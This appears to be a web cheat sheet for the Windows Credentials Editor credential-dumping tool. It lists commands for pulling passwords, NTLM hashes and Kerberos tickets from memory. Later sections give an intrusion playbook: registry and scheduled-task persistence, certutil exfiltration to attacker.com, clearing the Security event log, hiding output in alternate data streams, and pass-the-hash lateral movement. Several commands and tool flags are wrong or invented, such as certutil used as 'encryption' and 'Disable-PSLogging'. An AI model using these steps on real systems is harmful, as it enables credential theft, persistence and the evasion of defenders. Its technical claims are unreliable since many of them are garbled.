WCE (Windows Credentials Editor)
Overview
Section titled “Overview”WCE (Windows Credentials Editor) is a specialized tool for extracting and manipulating Windows credentials from memory. It allows authorized security professionals to view plaintext passwords, NTLM hashes, and Kerberos tickets from running processes. WCE is used in authorized penetration testing, red team exercises, and security research on Windows systems.
Prerequisites
Section titled “Prerequisites”- Windows system with administrator privileges
- Understanding of Windows credential storage mechanisms
- Authorization to perform credential testing
Installation
Section titled “Installation”Direct Download
Section titled “Direct Download”Download the precompiled binary from the official release site:
# Download wce.exe
# SHA256: Verify checksum before execution
certutil -hashfile wce.exe SHA256Compilation (Optional)
Section titled “Compilation (Optional)”# For advanced users compiling from source
# Requires Windows development environment
# gcc or MSVC toolchain
gcc -o wce.exe wce.cFile Structure
Section titled “File Structure”wce/
├── wce.exe # Main executable (32-bit)
├── wce-universal.exe # Universal binary
├── README.txt
└── CHANGELOGBasic Commands
Section titled “Basic Commands”| Command | Description |
|---|---|
wce -l | List all credentials in memory |
wce -c | Display running processes with credentials |
wce -g | Get credentials from specific process |
wce -s | Start process and extract credentials |
wce -k | Extract Kerberos tickets |
wce -n | Extract NTLM hashes |
wce -w | Write credentials to file |
wce -h | Display help information |
Credential Extraction
Section titled “Credential Extraction”List All Credentials
Section titled “List All Credentials”# Extract all credentials from memory
wce -l
# Output example:
# User: DOMAIN\Administrator
# Password: P@ssw0rd123
# Hash: 8846f7eaee8fb117ad06bdd830b7586cExtract from Specific Process
Section titled “Extract from Specific Process”# Get credentials from a specific PID
wce -l -s ProcessName
# Get credentials from explorer.exe
wce -l -s explorer.exe
# Get credentials from svchost.exe
wce -l -s svchost.exeVerbose Output
Section titled “Verbose Output”# Detailed credential information
wce -l -v
# Shows:
# - Username
# - Domain
# - Plaintext password
# - NTLM hash
# - Process ID
# - Credential typeNTLM Hash Extraction
Section titled “NTLM Hash Extraction”Extract NTLM Hashes
Section titled “Extract NTLM Hashes”# Get all NTLM hashes from memory
wce -l -n
# Output format:
# username:domain:lmhash:ntmhash
# Administrator:WORKGROUP:aad3b435b51404eeaad3b435b51404ee:8846f7eaee8fb117ad06bdd830b7586cSave Hashes to File
Section titled “Save Hashes to File”# Export hashes for crack attempt
wce -l -n > hashes.txt
# Format for hashcat/john:
# username:uid:lmhash:ntmhash:::Identify Hash Types
Section titled “Identify Hash Types”# Determine which hashes are present
wce -l -n | findstr /v "aad3b435b51404eeaad3b435b51404ee"
# aad3b435b51404eeaad3b435b51404ee is empty LM hash indicatorKerberos Ticket Extraction
Section titled “Kerberos Ticket Extraction”Extract Kerberos Tickets
Section titled “Extract Kerberos Tickets”# List all Kerberos tickets in memory
wce -l -k
# Output shows:
# - Service ticket granting ticket (TGT)
# - Service tickets (ST)
# - Session keysExport Tickets for Pass-the-Ticket
Section titled “Export Tickets for Pass-the-Ticket”# Extract ticket in base64 format
wce -l -k -b > tickets.txt
# Import and use with ptk tools
# or Mimikatz pass-the-ticket functionalityProcess Monitoring
Section titled “Process Monitoring”Monitor Running Processes
Section titled “Monitor Running Processes”# List processes with cached credentials
wce -c
# Shows active processes with credential handles
# Useful for targeting services and system processesDump Credentials from Service Account
Section titled “Dump Credentials from Service Account”# Target specific service
wce -l -s "SQL Server (MSSQLSERVER)"
# Target IIS application pool
wce -l -s "w3wp.exe"
# Target backup service
wce -l -s "mbsvc.exe"Advanced Usage
Section titled “Advanced Usage”Silent Extraction Mode
Section titled “Silent Extraction Mode”# Extract without user feedback
wce -l -s ProcessName -w output.txt
# Redirect all output to file
# Useful for automated red team operationsFilter Credentials by Domain
Section titled “Filter Credentials by Domain”# Extract only domain credentials
wce -l | findstr "DOMAIN\"
# Extract local machine credentials
wce -l | findstr /v "DOMAIN"Continuous Monitoring
Section titled “Continuous Monitoring”# Monitor for new credentials over time
wce -l > credentials_snapshot.txt
# Wait and capture changes
timeout /t 300
wce -l > credentials_update.txt
# Compare snapshots
fc credentials_snapshot.txt credentials_update.txtIntegration with Other Tools
Section titled “Integration with Other Tools”Pass-the-Hash with WCE
Section titled “Pass-the-Hash with WCE”# Extract NTLM hash
wce -l -n > hashes.txt
# Use with PsExec pass-the-hash:
# psexec.exe -h \\targethost -u DOMAIN\user -p :ntmhash cmd.exeCredential Dumping Pipeline
Section titled “Credential Dumping Pipeline”# Extract and prepare for cracking
wce -l -n | sed 's/:.*$//' > usernames.txt
wce -l -n | sed 's/.*://' > hashes.txt
# Match for rainbow table lookup
# or GPU cracking with hashcatIntegration with Mimikatz
Section titled “Integration with Mimikatz”# WCE focuses on memory extraction
# Mimikatz handles encryption/logonsessions
# Complement with Mimikatz:
# mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords"
# Compare results for complete credential auditSecure Credential Handling
Section titled “Secure Credential Handling”Encrypt Exported Credentials
Section titled “Encrypt Exported Credentials”# Export and encrypt immediately
wce -l > creds.txt
# Encrypt output
certutil -hashfile creds.txt SHA256
# Delete original
del /secure creds.txtLog Credential Access
Section titled “Log Credential Access”# Create audit trail
echo [%date% %time%] WCE executed by %username% >> audit.log
wce -l >> audit.log
# Encrypt audit log
cipher /e /s:%cd% audit.logDetection and Evasion
Section titled “Detection and Evasion”Stealth Extraction
Section titled “Stealth Extraction”# Run from temporary location
cd %temp%
wce.exe -l > output.txt
# Use alternate data streams (Windows)
wce.exe -l > output.txt:hidden
# Clean temporary artifacts
del output.txtTiming Considerations
Section titled “Timing Considerations”# Extract during user logon/logoff
# When credentials are most likely in memory
# Target peak hours for service credentials
# Avoid antivirus scan windowsTroubleshooting
Section titled “Troubleshooting”No Credentials Found
Section titled “No Credentials Found”# Issue: No credentials displayed
# Solution 1: Verify admin privileges
whoami /priv | findstr SeDebugPrivilege
# Solution 2: Check for 64-bit vs 32-bit mismatch
wce.exe -l # 32-bit
# Try 64-bit version for x64 systemsAccess Denied Error
Section titled “Access Denied Error”# Issue: "Access Denied" when running WCE
# Solution: Run as Administrator
# Method 1: Right-click Run as Administrator
# Method 2: From admin command prompt
wce.exe -l
# Method 3: Schedule as SYSTEM
schtasks /create /tn "CredDump" /tr "wce.exe -l" /sc once /st 12:00Missing Credentials
Section titled “Missing Credentials”# Issue: Expected credentials not shown
# Possible causes:
# 1. Credentials cleared from memory
# 2. User not logged in
# 3. Process permissions restrict access
# Solution: Check active sessions
wce -c
# Wait for user to interact with system
# Credentials cached when passwords enteredOperational Security
Section titled “Operational Security”OPSEC Best Practices
Section titled “OPSEC Best Practices”# 1. Use temporary filenames
set /p filename=<nul
wce.exe -l > %random%.txt
# 2. Compress and encrypt output
wce.exe -l | gzip > creds.gz
# Transfer via encrypted channel
# 3. Delete WCE and artifacts
del wce.exe
del %random%.txtDetection Mitigation
Section titled “Detection Mitigation”# 1. Disable Windows Update notifications
# 2. Clear event logs
wevtutil cl Security
# 3. Remove command history
history -c
# 4. Close all logging
# Disable PowerShell logging
powershell -NoProfile -Command "Disable-PSLogging"Practical Examples
Section titled “Practical Examples”Red Team Credential Harvesting
Section titled “Red Team Credential Harvesting”# Establish persistence
reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "Cred" /d "C:\Windows\Temp\wce.exe -l > C:\Windows\Temp\log.txt"
# Create scheduled task for periodic dumps
schtasks /create /tn "System Maintenance" /tr "C:\Windows\Temp\wce.exe -l >> C:\Windows\Temp\log.txt" /sc hourly
# Exfiltrate credentials
certutil -urlcache -f "http://attacker.com/upload.php?data=" log.txtPrivilege Escalation Chain
Section titled “Privilege Escalation Chain”# 1. Get current user credentials
wce -l -s explorer.exe
# 2. Extract service account credentials
wce -l -s svchost.exe
# 3. Use extracted credentials for lateral movement
# psexec -u DOMAIN\serviceaccount -p password \\target cmd.exeCredential Audit
Section titled “Credential Audit”# Comprehensive audit script
@echo off
echo [*] WCE Credential Audit - %date% %time%
wce -l -v >> audit_report.txt
echo.
echo [*] NTLM Hashes:
wce -l -n >> audit_report.txt
echo.
echo [*] Kerberos Tickets:
wce -l -k >> audit_report.txt
echo Audit complete - results in audit_report.txtComparison with Similar Tools
Section titled “Comparison with Similar Tools”| Tool | Purpose | Focus |
|---|---|---|
| WCE | Plaintext password extraction | Windows credentials in memory |
| Mimikatz | Complete Windows security analysis | Encryption, logon sessions |
| ProcDump | Memory dump utility | Generic process memory |
| PowerSploit | PowerShell exploitation framework | Full Windows exploitation |
| Responder | LLMNR/NBNS poisoning | Network credential capture |
Limitations
Section titled “Limitations”- Requires admin privileges
- Plaintext passwords limited to cached/active sessions
- Works primarily on Windows systems
- Modern credential guard may limit effectiveness
- Service account passwords vary by running context
Related Tools
Section titled “Related Tools”- Mimikatz: More comprehensive Windows exploitation
- Responder: Network-based credential capture
- LaZagne: Cross-platform credential recovery
- CrackMapExec: Lateral movement and credential testing
References
Section titled “References”- Windows Credentials Editor Repository
- NTLM Hash Specification Microsoft Docs
- Kerberos Authentication RFC 4120
- Credential Guard Microsoft Security Blog
Legal Notice
Section titled “Legal Notice”WCE is designed for authorized security testing, red team exercises, and defensive research. Unauthorized access to computer systems is illegal. Only use on systems you own or have explicit written permission to test.